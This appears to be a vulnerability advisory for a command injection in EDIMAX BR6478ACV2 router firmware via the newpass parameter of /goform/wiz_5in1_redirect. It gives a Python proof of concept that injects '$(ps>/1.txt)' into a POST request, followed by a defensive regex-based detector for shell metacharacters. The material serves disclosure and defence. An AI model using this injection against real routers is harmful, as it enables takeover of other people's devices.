BR6478ACV2_v1.23
The EDIMAX BR6478ACV2_v1.23 firmware has a command injection vulnerability in the wiz_5in1_redirect function. The function reads the newpass parameter of a POST request into a variable (Var). Because the user controls this input and the value reaches a system() call, a command injection is possible.

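import requests

# Device address used in this PoC
ip = "192.168.2.1"
# newpass value containing a shell command substitution
payload = "$(ps>/1.txt)"
data = {"updateLogInPw_page": '1', "newpass": payload}
url = f'http://{ip}/goform/wiz_5in1_redirect'
# POST the form to the vulnerable handler and print the response status
res = requests.post(url=url, data=data, verify=False)
print(res)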
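
A detection check for this request pattern, added here as an example and not part of the original advisory or the vendor's code: it inspects form bodies posted to /goform/wiz_5in1_redirect and flags newpass values containing shell metacharacters. The metacharacter list is a heuristic assumption, the function names are hypothetical, and the sample requests are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter named in the advisory above.
TARGET_PATH = "/goform/wiz_5in1_redirect"
TARGET_PARAM = "newpass"

# Sequences a shell interprets: command substitution, backticks, separators,
# pipes, redirection, newlines. Heuristic list (assumption); a legitimate
# password may contain some of these, so treat hits as alerts to review.
SHELL_META = re.compile(r"\$\(|\$\{|`|[;|&<>\r\n]")


def suspicious_newpass(method, target, body):
    """Return the newpass values in one request that contain shell metacharacters."""
    if method.upper() != "POST":
        return []
    if urlsplit(target).path.rstrip("/") != TARGET_PATH:
        return []
    # parse_qs percent-decodes values, so encoded payloads are seen in clear.
    fields = parse_qs(body, keep_blank_values=True)
    return [v for v in fields.get(TARGET_PARAM, []) if SHELL_META.search(v)]


# Constructed sample requests: (method, request target, form body).
SAMPLES = [
    ("POST", "/goform/wiz_5in1_redirect", "updateLogInPw_page=1&newpass=Correct-Horse-9"),
    ("POST", "/goform/wiz_5in1_redirect", "updateLogInPw_page=1&newpass=%24%28ps%3E%2F1.txt%29"),
    ("GET", "/goform/wiz_5in1_redirect", ""),
    ("POST", "/goform/example_other", "newpass=a%3Bb"),  # different handler, out of scope
]


def scan(samples):
    """Return (index, flagged values) for every sample that triggers the check."""
    return [(i, hits) for i, s in enumerate(samples) if (hits := suspicious_newpass(*s))]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLES):
        print(f"request #{idx}: suspicious newpass {hits!r}")
```

The same pattern can serve as an input allowlist in front of the device; the firmware-side fix is to stop passing the value to system().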
